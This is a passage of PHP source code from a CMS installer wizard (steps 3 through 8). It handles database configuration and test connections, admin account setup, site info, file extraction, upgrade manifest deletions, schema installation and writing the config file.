     * @throws \SmartyException
     */
    protected function display()
    {
        parent::display();
        $verbose = $this->get_wizard()->get_data('verbose',0);
        $informational = '';
        $tests = '';
        [$tests_failed,$can_continue] = $this->perform_tests($verbose,$informational,$tests);

        $app = \__appbase\get_app();
        $smarty = \__appbase\smarty();
        $smarty->assign('tests_failed',$tests_failed);
        $smarty->assign('can_continue',$can_continue);
        $smarty->assign('verbose',$verbose);
        $smarty->assign('retry_url',$_SERVER['REQUEST_URI']);
        if( $verbose ) $smarty->assign('information',$informational);
        if( \count($tests) )	$smarty->assign('tests', $tests);
        $url = $this->get_wizard()->next_url();
        $smarty->assign('next_url',$url);

        // todo: urls for retry, and enable verbose mode.
        $smarty->display('wizard_step3.tpl');
        $this->finish();
    }

    private function _get_session_save_path()
    {
        $path = \ini_get('session.save_path');
        if(FALSE !== ($pos = \strpos($path, ';'))) $path = \substr($path, $pos + 1);

        if( $path ) return $path;
    }

    private function _GDVersion()
    {
        static $gd_version_number = null;

        if(NULL === $gd_version_number) {
            if(\extension_loaded('gd')) {
                if(\defined('GD_MAJOR_VERSION')) {
                    $gd_version_number = \GD_MAJOR_VERSION;
                    return $gd_version_number;
                }
                $gdinfo = @\gd_info();
                if(\preg_match('/\d+/', $gdinfo['GD Version'], $gdinfo)) {
                    $gd_version_number = (int) $gdinfo[0];
                } else {
                    $gd_version_number = 1;
                }
                return $gd_version_number;
            }
            $gd_version_number = 0;
        }

        return $gd_version_number;
    }

} // end of class

?>
<?php

namespace cms_autoinstaller;
use \__appbase;

class wizard_step4 extends \cms_autoinstaller\wizard_step
{
    private $_config;
    private $_dbms_options;

    public function __construct()
    {
        parent::__construct();

        $tz = \date_default_timezone_get();
        if(!$tz) @\date_default_timezone_set('UTC');
      $this->_config = [
        'dbtype'        => '',
        'dbhost'        => 'localhost',
        'dbname'        => '',
        'dbuser'        => '',
        'dbpass'        => '',
        'dbprefix'      => 'cms_',
        'dbport'        => '',
        'samplecontent' => TRUE,
        'query_var'     => '',
        'timezone'      => $tz
      ];

        // get saved date
        $tmp = $this->get_wizard()->get_data('config');
        if($tmp) $this->_config = \array_merge($this->_config, $tmp);

        $databases = ['mysqli' =>'MySQLi (4.1+)'];
        $this->_dbms_options = [];
        foreach ($databases as $db => $lbl) {
            if( \extension_loaded($db) ) $this->_dbms_options[$db] = $lbl;
        }
        if( !\count($this->_dbms_options) ) throw new \RuntimeException(\__appbase\lang('error_nodatabases'));

        $action = $this->get_wizard()->get_data('action');
        if( $action == 'freshen' || $action == 'upgrade' ) {
            // read config data from config.php for freshen action.
            $app = \__appbase\get_app();
            $destdir = $app->get_destdir();
            
            /** @var  array $config from config.php */
            $config_file = $destdir.'/config.php';
            include_once($config_file);
            $this->_config['dbtype']   = $config['dbms'];
            $this->_config['dbhost']   = $config['db_hostname'];
            $this->_config['dbuser']   = $config['db_username'];
            $this->_config['dbpass']   = $config['db_password'];
            $this->_config['dbname']   = $config['db_name'];
            $this->_config['dbprefix'] = $config['db_prefix'];
            if( isset($config['db_port']) ) $this->_config['dbport'] = $config['db_port'];
            if( isset($config['query_var']) ) $this->_config['query_var'] = $config['query_var'];
            if( isset($config['timezone']) ) $this->_config['timezone'] = $config['timezone'];
        }
    }

    private function validate($config)
    {
      # TODO consider defining our own exceptions for this
        $action = $this->get_wizard()->get_data('action');
        if( !isset($config['dbtype']) || !$config['dbtype'] ) throw new \RuntimeException(\__appbase\lang('error_nodbtype'));
        if( !isset($config['dbhost']) || !$config['dbhost'] ) throw new \RuntimeException(\__appbase\lang('error_nodbhost'));
        if( !isset($config['dbname']) || !$config['dbname'] ) throw new \RuntimeException(\__appbase\lang('error_nodbname'));
        if( !isset($config['dbuser']) || !$config['dbuser'] ) throw new \RuntimeException(\__appbase\lang('error_nodbuser'));
        if( !isset($config['dbpass']) || !$config['dbpass'] ) throw new \RuntimeException(\__appbase\lang('error_nodbpass'));
        if('install' == $action && (!isset($config['dbprefix']) || !$config['dbprefix'] ) ) throw new \RuntimeException(\__appbase\lang('error_nodbprefix'));
        if( !isset($config['timezone']) || !$config['timezone'] ) throw new \RuntimeException(\__appbase\lang('error_notimezone'));

        $re = '/^[a-zA-Z0-9_\.]*$/';
        if( isset($config['query_var']) && $config['query_var'] && !\preg_match($re, $config['query_var']) ) {
            throw new \RuntimeException(\__appbase\lang('error_invalidqueryvar'));
        }

        $all_timezones = \timezone_identifiers_list();
        if( !\in_array($config['timezone'], $all_timezones) ) throw new \RuntimeException(\__appbase\lang('error_invalidtimezone'));

        if( $config['dbpass'] ) {
            if(FALSE !== \strpos($config['dbpass'], "'") || FALSE !== \strpos($config['dbpass'], '\\')) {
                throw new \RuntimeException(\__appbase\lang('error_invaliddbpassword'));
            }
        }

        // try a test connection
        $spec           = new \CMSMS\Database\ConnectionSpec;
        $spec->type     = $config['dbtype'];
        $spec->host     = $config['dbhost'];
        $spec->username = $config['dbuser'];
        $spec->password = $config['dbpass'];
        $spec->dbname   = $config['dbname'];
        $spec->port     = $config['dbport'] ?? NULL;
        $spec->prefix   = $config['dbprefix'];
        $db             = \CMSMS\Database\Connection::initialize($spec);
        $db->Execute("SET NAMES 'utf8'");

        // see if we can create and drop a table.
        try {
            $db->Execute('CREATE TABLE '.$config['dbprefix'].'_dummyinstall (i int)');
        }
        catch( \Exception $e ) {
            throw new \RuntimeException(\__appbase\lang('error_createtable'));
        }

        try {
            $db->Execute('DROP TABLE '.$config['dbprefix'].'_dummyinstall');
        }
        catch( \Exception $e ) {
            throw new \RuntimeException(\__appbase\lang('error_droptable'));
        }

        // see if a smattering of core tables exist
        if( $action == 'install' ) {
            try {
                $res = $db->GetOne('SELECT content_id FROM '.$config['dbprefix'].'content');
                if( $res > 0 ) throw new \RuntimeException(\__appbase\lang('error_cmstablesexist'));
            }
            catch( \CMSMS\Database\DatabaseException $e ) {
                // if this fails it's not a problem
            }

            try {
                $db->GetOne('SELECT module_name FROM '.$config['dbprefix'].'modules');
                if( $res > 0 ) throw new \RuntimeException(\__appbase\lang('error_cmstablesexist'));
            }
            catch( \CMSMS\Database\DatabaseException $e ) {
                // if this fails it's not a problem.
            }
        }
    }

    protected function process()
    {
      $tmp                       = \array_keys($this->_dbms_options);
      $this->_config['dbtype']   = $tmp[0];
      $this->_config['dbhost']   = \trim(\__appbase\utils::clean_string($_POST['dbhost']));
      $this->_config['dbname']   = \trim(\__appbase\utils::clean_string($_POST['dbname']));
      $this->_config['dbuser']   = \trim(\__appbase\utils::clean_string($_POST['dbuser']));
      $this->_config['dbpass']   = $_POST['dbpass'];
      $this->_config['timezone'] = \trim(\__appbase\utils::clean_string($_POST['timezone']));
      
      if(isset($_POST['dbtype']))
      {
        $this->_config['dbtype'] = \trim(\__appbase\utils::clean_string($_POST['dbtype']));
      }
      
      if(isset($_POST['dbport']))
      {
        $this->_config['dbport'] = \trim(\__appbase\utils::clean_string($_POST['dbport']));
      }
      
      if(isset($_POST['dbprefix']))
      {
        $this->_config['dbprefix'] = \trim(\__appbase\utils::clean_string($_POST['dbprefix']));
      }
      
      if(isset($_POST['query_var']))
      {
        $this->_config['query_var'] = \trim(\__appbase\utils::clean_string($_POST['query_var']));
      }
      
      if(isset($_POST['samplecontent']))
      {
        $this->_config['samplecontent'] = (int)$_POST['samplecontent'];
      }
      
      if(isset($_POST['optional_modules']))
      {
        $this->_config['optional_modules'] = (array)$_POST['optional_modules'];
      }
      else
      {
        if( $this->get_wizard()->get_data('verbose',0) )
        {
          $this->_config['optional_modules'] = [];
        }
        else
        {
          $this->_config['optional_modules'] = ['News', 'UserGuide'];
        }
      }
      
        $this->get_wizard()->set_data('config',$this->_config);

        try {
            $app = \__appbase\get_app();
            $config = $app->get_config();
            $this->validate($this->_config);
            $url = $this->get_wizard()->next_url();
            $action = $this->get_wizard()->get_data('action');
            if('freshen' == $action) $url = $this->get_wizard()->step_url(6);
            if('upgrade' == $action) {
                if( $config['nofiles'] ) {
                    $url = $this->get_wizard()->step_url(8);
                } else {
                    $url = $this->get_wizard()->step_url(7);
                }
            }
            \__appbase\utils::redirect($url);
        }
        catch( \Exception $e ) {
            $smarty = \__appbase\smarty();
            $smarty->assign('error',$e->GetMessage());
        }
    }
  
  /**
   * @throws \SmartyException
   */
  protected function display()
    {
        parent::display();
        $smarty = \__appbase\smarty();
        $tmp = \timezone_identifiers_list();
        
        # we default the optional modules to both News and UserGuide
        if(!isset($this->_config['optional_modules'])) $this->_config['optional_modules'] = ['News', 'UserGuide'];
        
        if( !\is_array($tmp) ) throw new \RuntimeException(\__appbase\lang('error_tzlist'));
        $tmp2 = \array_combine(\array_values($tmp), \array_values($tmp));
        
        $smarty_assign = [
          'timezones' => \array_merge(['' =>\__appbase\lang('none')], $tmp2),
          'dbtypes'   => $this->_dbms_options,
          'action'    => $this->get_wizard()->get_data('action'),
          'verbose'   => $this->get_wizard()->get_data('verbose',0),
          'config'    => $this->_config,
          'yesno'     => ['0' =>\__appbase\lang('no'), '1' =>\__appbase\lang('yes')],
          # labels are preceded by a ' '
          'optional_modules' => [
            'News' => ' News',
            'UserGuide' => ' User Guide'
          ]
        ];
        
        $smarty->assign($smarty_assign);
        $smarty->display('wizard_step4.tpl');
        $this->finish();
    }

} // end of class
<?php

namespace cms_autoinstaller;
use \__appbase;

class wizard_step5 extends \cms_autoinstaller\wizard_step
{
    private $_adminacct;

    public function __construct()
    {
        parent::__construct();
        $this->_adminacct = ['username' =>'admin', 'emailaddr' =>'', 'password' =>'', 'repeatpw' =>'', 'saltpw' =>1, 'emailaccountinfo' =>1];
        $tmp = $this->get_wizard()->get_data('adminaccount');
        if(\is_array($tmp) && \count($tmp) ) $this->_adminacct = $tmp;
    }

    private function validate($acct)
    {
        if( !isset($acct['username']) || '' == $acct['username']) throw new \Exception(\__appbase\lang('error_adminacct_username'));
        if( !isset($acct['password']) || '' == $acct['password'] || \strlen($acct['password']) < 6 ) {
            throw new \RuntimeException(\__appbase\lang('error_adminacct_password'));
        }
        if( !isset($acct['repeatpw']) || $acct['repeatpw'] != $acct['password'] ) {
            throw new \RuntimeException(\__appbase\lang('error_adminacct_repeatpw'));
        }
        if( isset($acct['emailaddr']) && $acct['emailaddr'] != '' && !\__appbase\utils::is_email($acct['emailaddr']) ) {
            throw new \RuntimeException(\__appbase\lang('error_adminacct_emailaddr'));
        }
        if( (!isset($acct['emailaddr']) || $acct['emailaddr'] == '') && $acct['emailaccountinfo'] ) {
            throw new \RuntimeException(\__appbase\lang('error_adminacct_emailaddrrequired'));
        }
    }

    protected function process()
    {
      $this->_adminacct['username']  = \trim(\__appbase\utils::clean_string($_POST['username']));
      $this->_adminacct['emailaddr'] = \trim(\__appbase\utils::clean_string($_POST['emailaddr']));
      $this->_adminacct['password']  = \trim(\__appbase\utils::clean_string($_POST['password']));
      $this->_adminacct['repeatpw']  = \trim(\__appbase\utils::clean_string($_POST['repeatpw']));
        
        if( isset($_POST['saltpw']) ) $this->_adminacct['saltpw'] = (int)$_POST['saltpw'];
        $this->_adminacct['emailaccountinfo'] = 1;
        if( isset($_POST['emailaccountinfo']) ) $this->_adminacct['emailaccountinfo'] = (int)$_POST['emailaccountinfo'];

        $this->get_wizard()->set_data('adminaccount',$this->_adminacct);
        try {
            $this->validate($this->_adminacct);
            $url = $this->get_wizard()->next_url();
            \__appbase\utils::redirect($url);
        }
        catch( \Exception $e ) {
            $smarty = \__appbase\smarty();
            $smarty->assign('error',$e->GetMessage());
        }
    }
  
  /**
   * @throws \SmartyException
   */
  protected function display()
    {
        parent::display();
        $smarty = \__appbase\smarty();

        $smarty->assign('verbose',$this->get_wizard()->get_data('verbose',0));
        $smarty->assign('account',$this->_adminacct);
        $smarty->assign('yesno', ['0' =>\__appbase\lang('no'), '1' =>\__appbase\lang('yes')]);
        $smarty->display('wizard_step5.tpl');
        $this->finish();
    }

} // end of class

?><?php

namespace cms_autoinstaller;
use \__appbase;

class wizard_step6 extends \cms_autoinstaller\wizard_step
{
    private $_siteinfo;

    public function run()
    {
        $app = \__appbase\get_app();

        $tz = \date_default_timezone_get();
        if( !$tz ) @\date_default_timezone_set('UTC');

        $this->_siteinfo = ['sitename' =>'', 'languages' =>[]];
        $tmp = $this->get_wizard()->get_data('config');
        if( $tmp ) $this->_siteinfo = \array_merge($this->_siteinfo, $tmp);
        $lang = \__appbase\translator()->get_selected_language();
        if('en_US' != $lang) $this->_siteinfo['languages'] = [$lang ];

        $tmp = $this->get_wizard()->get_data('siteinfo');
        if(\is_array($tmp) && \count($tmp) ) $this->_siteinfo = $tmp;
        return parent::run();
    }

    private function validate($siteinfo)
    {
        $action = $this->get_wizard()->get_data('action');
        if('freshen' !== $action) {
            if( !isset($siteinfo['sitename']) || !$siteinfo['sitename'] ) throw new \Exception(\__appbase\lang('error_nositename'));
        }
    }

    protected function process()
    {
        $app = \__appbase\get_app();
        $config = $app->get_config();

        if( isset($_POST['sitename']) ) $this->_siteinfo['sitename'] = \trim(\__appbase\utils::clean_string($_POST['sitename']));
        if( isset($_POST['languages']) ) {
            $tmp = [];
            foreach ( $_POST['languages'] as $lang ) {
                $tmp[] = \__appbase\utils::clean_string($lang);
            }
            $this->_siteinfo['languages'] = $tmp;
        }

        $this->get_wizard()->set_data('siteinfo',$this->_siteinfo);
        try {
            $this->validate($this->_siteinfo);
            $url = $this->get_wizard()->next_url();
            if( $config['nofiles'] ) $url = $this->get_wizard()->step_url(8);
            \__appbase\utils::redirect($url);
        }
        catch( \Exception $e ) {
            $smarty = \__appbase\smarty();
            $smarty->assign('error',$e->GetMessage());
        }
    }
    
    /**
     * @throws \SmartyException
     */
    protected function display()
    {
        parent::display();
        $action = $this->get_wizard()->get_data('action');

        $smarty = \__appbase\smarty();
        $smarty->assign('action',$action);
        $smarty->assign('verbose',$this->get_wizard()->get_data('verbose',0));
        $smarty->assign('siteinfo',$this->_siteinfo);
        $smarty->assign('yesno', ['0' =>\__appbase\lang('no'), '1' =>\__appbase\lang('yes')]);
        $languages = \__appbase\get_app()->get_language_list();
        unset($languages['en_US']);
        $smarty->assign('language_list',$languages);

        $smarty->display('wizard_step6.tpl');
        $this->finish();
    }
} // end of class

?>
<?php

namespace cms_autoinstaller;
use \__appbase;

class wizard_step7 extends \cms_autoinstaller\wizard_step
{
    protected function process()
    {
        // nothing here
    }

    private function _createIndexHTML($filename)
    {
        $str = '<!-- DUMMY HTML FILE -->';
        \file_put_contents($filename, $str);
    }

    private function detect_languages()
    {
        $this->message(\__appbase\lang('install_detectlanguages'));
        $destdir = \__appbase\get_app()->get_destdir();

        $nlsdir = "$destdir/lib/nls";
        $pattern = "$nlsdir/*nls.php";
        $files = \glob($pattern);
        if(!\is_array($files) || 0 == count($files)) throw new \RuntimeException(\__appbase\lang('error_internal', 750));

        foreach( $files as &$one ) {
            $fn = \basename($one);
            $one = \substr($fn, 0, \strlen($fn) - \strlen('.nls.php'));
        }
        return $files;
    }

    private function do_index_html()
    {
        $this->message(\__appbase\lang('install_dummyindexhtml'));

        $destdir = \__appbase\get_app()->get_destdir();
        if( !$destdir ) throw new \Exception(\__appbase\lang('error_internal',751));
        $archive = \__appbase\get_app()->get_archive();
        $phardata = new \PharData($archive);
        $archive = \basename($archive);
        foreach( new \RecursiveIteratorIterator($phardata) as $file => $it ) {
            if(FALSE === ($p = \strpos($file, $archive))) continue;
            $fn = \substr($file, $p + \strlen($archive));
            $dn = $destdir . \dirname($fn);
            if( $dn == $destdir || $dn == $destdir.'/' ) continue;
            if( $dn == "$destdir/admin" ) continue;
            $idxfile = $dn.'/index.html';
            if(\is_dir($dn) && !\is_file($idxfile) )  $this->_createIndexHTML($idxfile);
        }
    }
  
  /**
   * @throws \Exception
   */
  private function do_files($langlist = null)
    {
      # TODO - we need to have an alternative routine only for uploads,
      #        to be able to check for deleted theme folders and not create them again
      #         (JM)
        $languages = ['en_US'];
        $siteinfo = $this->get_wizard()->get_data('siteinfo');
        if(\is_array($siteinfo) && \is_array($siteinfo['languages']) && \count($siteinfo['languages']) ) $languages = \array_merge($languages, $siteinfo['languages']);
        if(\is_array($langlist) && \count($langlist) ) $languages = \array_merge($languages, $langlist);
        $languages = \array_unique($languages);

        $destdir = \__appbase\get_app()->get_destdir();
        if( !$destdir ) throw new \RuntimeException(\__appbase\lang('error_internal', 601));
        $archive = \__appbase\get_app()->get_archive();

        $this->message(\__appbase\lang('install_extractfiles'));
        $phardata = new \PharData($archive);
        $archive = \basename($archive);
        $filehandler = new \cms_autoinstaller\install_filehandler();
        $filehandler->set_languages($languages);
        $filehandler->set_destdir($destdir);
        $filehandler->set_output_fn('\cms_autoinstaller\wizard_step6::verbose');
        foreach( new \RecursiveIteratorIterator($phardata) as $file => $it ) {
            if(FALSE === ($p = \strpos($file, $archive))) continue;
            $fn = \substr($file, $p + \strlen($archive));
            $filehandler->handle_file($fn,$file,$it);
        }
    }

    private function do_manifests()
    {
        // get the list of all available versions that this upgrader knows about
        $app = \__appbase\get_app();
        $app_config = $app->get_config();
        $upgrade_dir =  $app::get_appdir().'/upgrade';
        if( !\is_dir($upgrade_dir) ) throw new \RuntimeException(\__appbase\lang('error_internal', 710));
        $destdir = $app->get_destdir();
        if( !$destdir ) throw new \RuntimeException(\__appbase\lang('error_internal', 711));

        $version_info = $this->get_wizard()->get_data('version_info');
        $versions = utils::get_upgrade_versions();
        if(\is_array($versions) && \count($versions) ) {
            $this->message(\__appbase\lang('cleaning_files'));
            foreach( $versions as $one_version ) {
                if(\version_compare($one_version, $version_info['version']) < 1 ) continue;

                // open the manifest
                // check the to version info
                $manifest = new manifest_reader("$upgrade_dir/$one_version");
              
              if($one_version != $manifest->to_version())
              {
                throw new \RuntimeException(\__appbase\lang('error_internal', 712));
              }

                // delete all files marked for deletion
                // if they are supposed to be in the installation,
                // the copy from the archive will restore them.
                $deleted  = $manifest->get_deleted();
                $ndeleted = 0;
                $nfailed  = 0;
                $nmissing = 0;
                
                if(\is_array($deleted) && \count($deleted) ) {
                    foreach( $deleted as $rec ) {
                        $fn = "{$destdir}{$rec['filename']}";
                        if( !\file_exists($fn) ) {
                            self::verbose("file $fn does not exist... but we planned to delete it anyway");
                            $nmissing++;
                        }
                        else if( !\is_writable($fn) ) {
                            $this->error("file $fn is not writable, could not delete it");
                            $nfailed++;
                        }
                        else {
                            if( \is_dir($fn) ) {
				if( \is_file($fn . '/index.html') ) @\unlink($fn . '/index.html');
                                $res = @\rmdir($fn);
				if( !$res ) {
				    $this->error('problem removing directory: '.$fn);
				    $nfailed++;
 				} else {
                                    self::verbose('removed directory: ' . $fn);
                                    $ndeleted++;
				}
                            }
                            else {
                                $res = @\unlink($fn);
                                if( !$res ) {
                                    $this->error("problem deleting: $fn");
                                    $nfailed++;
                                }
                                else {
                                    self::verbose('removed file: ' . $fn);
                                    $ndeleted++;
                                }
                            }
                        }
                    }
                }

                $this->message($ndeleted.' files/folders deleted for version '.$one_version . ': ' . $nmissing . ' missing, ' . $nfailed . ' failed');
            }
        }
    }
  
  /**
   * @throws \SmartyException
   */
    protected function display()
    {
        // here, we do either the upgrade, or the install stuff.
        parent::display();
        $action = $this->get_wizard()->get_data('action');
        \__appbase\smarty()->assign('next_url',$this->get_wizard()->next_url());
        if('freshen' == $action) {
            \__appbase\smarty()->assign('next_url',$this->get_wizard()->step_url(9));
        }
        echo \__appbase\smarty()->display('wizard_step7.tpl');
        \flush();

        // create index.html files in directories.
        try {
            $action = $this->get_wizard()->get_data('action');
            $tmp = $this->get_wizard()->get_data('version_info');
            if( $action == 'upgrade' && \is_array($tmp) && \count($tmp) ) {
                $languages = $this->detect_languages();
                $this->do_manifests();
                $this->do_files($languages);
            }
            else if('freshen' == $action) {
                $inst_languages = $this->detect_languages();
                $this->do_files($inst_languages);
            }
            else if('install' == $action) {
                $this->do_files();
            }
            else {
                throw new \RuntimeException(\__appbase\lang('error_internal', 705));
            }

            $this->do_index_html();
        }
        catch( \Exception $e ) {
            $this->error($e->GetMessage());
        }

        $this->finish();
    }

} // end of class
<?php

namespace cms_autoinstaller;
use \__appbase;

/**
 * At this point we assume the files have been copied to the destination
 * so that we can connect to the database and use a number of functions and classes
 * available in the CMSMS API
 *
 * Class wizard_step8
 * @package cms_autoinstaller
 */
class wizard_step8 extends \cms_autoinstaller\wizard_step
{
    protected function process()
    {
        // nothing here
    }
    
    /**
     * @throws \CMSMS\Database\ConnectionSpecException
     */
    private function db_connect($destconfig)
    {
        $spec = new \CMSMS\Database\ConnectionSpec;
        if( isset($destconfig['dbms']) ) {
            $spec->type     = $destconfig['dbms'];
            $spec->host     = $destconfig['db_hostname'];
            $spec->username = $destconfig['db_username'];
            $spec->password = $destconfig['db_password'];
            $spec->dbname   = $destconfig['db_name'];
            $spec->prefix   = $destconfig['db_prefix'];
        }
        else {
            $spec->type     = $destconfig['dbtype'];
            $spec->host     = $destconfig['dbhost'];
            $spec->username = $destconfig['dbuser'];
            $spec->password = $destconfig['dbpass'];
            $spec->dbname   = $destconfig['dbname'];
            $spec->port     = isset($destconfig['dbport']) ? $destconfig['dbport'] : NULL;
            $spec->prefix   = $destconfig['dbprefix'];
        }
        if( !\defined('CMS_DB_PREFIX')) \define('CMS_DB_PREFIX', $spec->prefix);
        $db = \CMSMS\Database\Connection::initialize($spec);
        $obj = $this;
        $db->SetErrorHandler(function() { /* do nohing */ });
        $db->Execute("SET NAMES 'utf8'");
        \CMSMS\Database\compatibility::noop();
        /** CmsApp instance will be available here after the files been copied */
        \CmsApp::get_instance()->_setDb($db);
        return $db;
    }

    private function connect_to_cmsms($destdir)
    {
        global $CMS_INSTALL_PAGE, $DONT_LOAD_DB, $DONT_LOAD_SMARTY, $CMS_VERSION, $CMS_PHAR_INSTALLER;
        $CMS_INSTALL_PAGE = 1;
        $DONT_LOAD_DB = 1;
        $DONT_LOAD_SMARTY = 1;
        $CMS_PHAR_INSTALLER = 1;
        $CMS_VERSION = $this->get_wizard()->get_data('destversion');

        // setup and initialize the cmsms API's
        // note DONT_LOAD_DB and DONT_LOAD_SMARTY are used.
        if( \is_file("$destdir/lib/include.php") ) {
            include_once("$destdir/lib/include.php");
        }
        else {
            throw new \RuntimeException('Could not find include.php file in destination');
        }

    }
    
    /**
     * @throws \CMSMS\Database\ConnectionSpecException
     */
    private function do_install()
    {
        $dir = \__appbase\get_app()->get_appdir().'/install';

        $destdir = \__appbase\get_app()->get_destdir();
        if( !$destdir ) throw new \RuntimeException(\__appbase\lang('error_internal', 700));

        $adminaccount = $this->get_wizard()->get_data('adminaccount');
        if( !$adminaccount ) throw new \RuntimeException(\__appbase\lang('error_internal', 701));

        $destconfig = $this->get_wizard()->get_data('config');
        if( !$destconfig ) throw new \RuntimeException(\__appbase\lang('error_internal', 703));

        $siteinfo = $this->get_wizard()->get_data('siteinfo');
        if( !$siteinfo ) throw new \RuntimeException(\__appbase\lang('error_internal', 704));

        // connect to the CMSMS API
        $this->connect_to_cmsms($destdir);

        // connect to the database
        $db = $this->db_connect($destconfig);

        include_once(__DIR__.'/msg_functions.php');

        try {
            // create some variables that the sub functions need.
            if( !\defined('CMS_ADODB_DT') ) \define('CMS_ADODB_DT', 'DT');
            $admin_user = null;
            $db_prefix = CMS_DB_PREFIX;

            // install the schema
            $this->message(\__appbase\lang('install_schema'));
            $fn = $dir.'/schema.php';
            if( !\file_exists($fn) ) throw new \RuntimeException(\__appbase\lang('error_internal', 705));

            global $CMS_INSTALL_DROP_TABLES, $CMS_INSTALL_CREATE_TABLES;
            $CMS_INSTALL_DROP_TABLES=1;
            $CMS_INSTALL_CREATE_TABLES=1;
            include_once($fn);

            self::verbose(\__appbase\lang('install_setsequence'));
            include_once($dir.'/createseq.php');

            if( $adminaccount['saltpw'] ) {
                self::verbose(\__appbase\lang('install_passwordsalt'));
                $salt = \substr(\str_shuffle(\md5($destdir) . \time()), 0, 16);
                \cms_siteprefs::set('sitemask',$salt);
            }
            
            $tmp_dir_errors = [];

            // create tmp directories
            self::verbose(\__appbase\lang('install_createtmpdirs'));
            if(!@\mkdir($concurrentDirectory = $destdir . '/tmp/cache', 0777, TRUE) && !\is_dir($concurrentDirectory))
            {
                $tmp_dir_errors[] = \sprintf('Directory "%s" was not created', $concurrentDirectory);
                //throw new \RuntimeException(\sprintf('Directory "%s" was not created', $concurrentDirectory));
            }
            
            if(!@\mkdir($concurrentDirectory = $destdir . '/tmp/templates_c', 0777, TRUE) && !\is_dir($concurrentDirectory)
            )
            {
                $tmp_dir_errors[] = \sprintf('Directory "%s" was not created', $concurrentDirectory);
                //throw new \RuntimeException(\sprintf('Directory "%s" was not created', $concurrentDirectory));
            }

            include_once($dir.'/base.php');
            
            if( \count($tmp_dir_errors) > 0 )
            {
                $this->message(\implode("\n", $tmp_dir_errors));
            }

            $this->message(\__appbase\lang('install_defaultcontent'));
            $fn = $dir.'/initial.php';
            if( $destconfig['samplecontent'] ) $fn = $dir.'/extra.php';
            include_once($fn);

            self::verbose(\__appbase\lang('install_setsitename'));
            \cms_siteprefs::set('sitename',$siteinfo['sitename']);

            $this->write_config();

            // update all hierarchy positions
            $this->message(\__appbase\lang('install_updatehierarchy'));
            $contentops = cmsms()->GetContentOperations();
            $contentops->SetAllHierarchyPositions();

            // todo: install default preferences
            set_site_preference('global_umask','022');
        }
        catch( \Exception $e ) {
            $this->error($e->GetMessage());
        }
    }
    
    /**
     * @param $version_info
     *
     * @throws \CMSMS\Database\ConnectionSpecException
     */
    private function do_upgrade($version_info)
    {
        global $CMS_INSTALL_PAGE, $DONT_LOAD_DB, $DONT_LOAD_SMARTY, $CMS_VERSION, $CMS_PHAR_INSTALLER;
        $CMS_INSTALL_PAGE = 1;
        $CMS_PHAR_INSTALLER = 1;
        $DONT_LOAD_DB = 1;
        $DONT_LOAD_SMARTY = 1;
        $CMS_VERSION = $this->get_wizard()->get_data('destversion');

        // get the list of all available versions that this upgrader knows about
        $app = \__appbase\get_app();
        $dir =  $app::get_appdir().'/upgrade';
        if( !\is_dir($dir) ) throw new \RuntimeException(\__appbase\lang('error_internal', 710));
        $destdir = $app->get_destdir();
        if( !$destdir ) throw new \RuntimeException(\__appbase\lang('error_internal', 711));

        $dh = \opendir($dir);
        $versions = [];
        
        if( !$dh ) throw new \RuntimeException(\__appbase\lang('error_internal', 712));
        while( ($file = \readdir($dh)) !== false ) {
            if( $file == '.' || $file == '..' ) continue;
            if(\is_dir($dir . '/' . $file) && (\is_file("$dir/$file/MANIFEST.DAT") || \is_file("$dir/$file/MANIFEST.DAT.gz")) ) $versions[] = $file;
        }
        \closedir($dh);
        if( \count($versions) ) \usort($versions, 'version_compare');

        $destconfig = $this->get_wizard()->get_data('config');
        if( !$destconfig ) throw new \RuntimeException(\__appbase\lang('error_internal', 703));

        // setup and initialize the cmsms API's
        if( \is_file("$destdir/lib/include.php") ) {
            include_once("$destdir/lib/include.php");
        }
        else if( \is_file("$destdir/include.php")) {
            include_once( "$destdir/lib/include.php" );
        }
        else {
            throw new \RuntimeException('Could not find include.php file in destination');
        }

        // setup database connection
        $db = $this->db_connect($destconfig);

        include_once(__DIR__.'/msg_functions.php');

        try {
            // ready to do the upgrading now (in a loop)
            // only perform upgrades for the versions known by the installer that are greater than what is installed.
            $current_version = $version_info['version'];
            foreach( $versions as $ver ) {
                $fn = "$dir/$ver/upgrade.php";
                if(\version_compare($current_version, $ver) < 0 && \is_file($fn) ) {
                    include_once($fn);
                }
            }

            $this->write_config();

            $this->message(\__appbase\lang('done'));
        }
        catch( \Exception $e ) {
            $this->error($e->GetMessage());
        }
    }

    
    private function do_freshen()
    {
        try {
            $this->write_config();
        }
        catch( \Exception $e ) {
            $this->error($e->GetMessage());
        }
    }

    private function write_config()
    {
        $destconfig = $this->get_wizard()->get_data('config');
        if( !$destconfig ) throw new \RuntimeException(\__appbase\lang('error_internal', 703));

        $destdir = \__appbase\get_app()->get_destdir();
        if( !$destdir ) throw new \RuntimeException(\__appbase\lang('error_internal', 700));

        // create new config file.
        // this step has to go here.... as config file has to exist in step9
        // so that CMSMS can connect to the database.
        $fn = $destdir . '/config.php';
        if( \is_file($fn) ) {
            $this->verbose(\__appbase\lang('install_backupconfig'));
            $destfn = $destdir.'/bak.config.php';
            if( !\copy($fn, $destfn) ) throw new \Exception(\__appbase\lang('error_backupconfig'));
        }

        $this->connect_to_cmsms($destdir);

        $this->message(\__appbase\lang('install_createconfig'));
        $newconfig                = \cms_config::get_instance();
        $newconfig['dbms']        = \trim($destconfig['dbtype']);
        $newconfig['db_hostname'] = \trim($destconfig['dbhost']);
        $newconfig['db_username'] = \trim($destconfig['dbuser']);
        $newconfig['db_password'] = \trim($destconfig['dbpass']);
        $newconfig['db_name']     = \trim($destconfig['dbname']);
        $newconfig['db_prefix']   = \trim($destconfig['dbprefix']);
        $newconfig['timezone']    = \trim($destconfig['timezone']);
        if( $destconfig['query_var'] ) $newconfig['query_var'] = \trim($destconfig['query_var']);
        if( isset($destconfig['dbport']) ) {
            $num = (int)$destconfig['dbport'];
            if( $num > 0 ) $newconfig['db_port'] = $num;
        }
        $newconfig->save();
    }
    /**
     * @throws \SmartyException
     */
    protected function display()
    {
        parent::display();
        \__appbase\smarty()->assign('next_url',$this->get_wizard()->next_url());
        echo \__appbase\smarty()->display('wizard_step8.tpl');

        // here, we do either the upgrade, or the install stuff.
        try {
            $action = $this->get_wizard()->get_data('action');
            $tmp = $this->get_wizard()->get_data('version_info');
            if( $action == 'upgrade' && \is_array($tmp) && \count($tmp) ) {
                $this->do_upgrade($tmp);
            }
            else if('freshen' == $action) {
                $this->do_freshen();
            }
            else if('install' == $action) {
                $this->do_install();
            }
            else {
                throw new \RuntimeException(\__appbase\lang('error_internal', 705));
            }
        }
        catch( \Exception $e ) {
            $this->error($e->GetMessage());
        }

        $this->finish();
    }
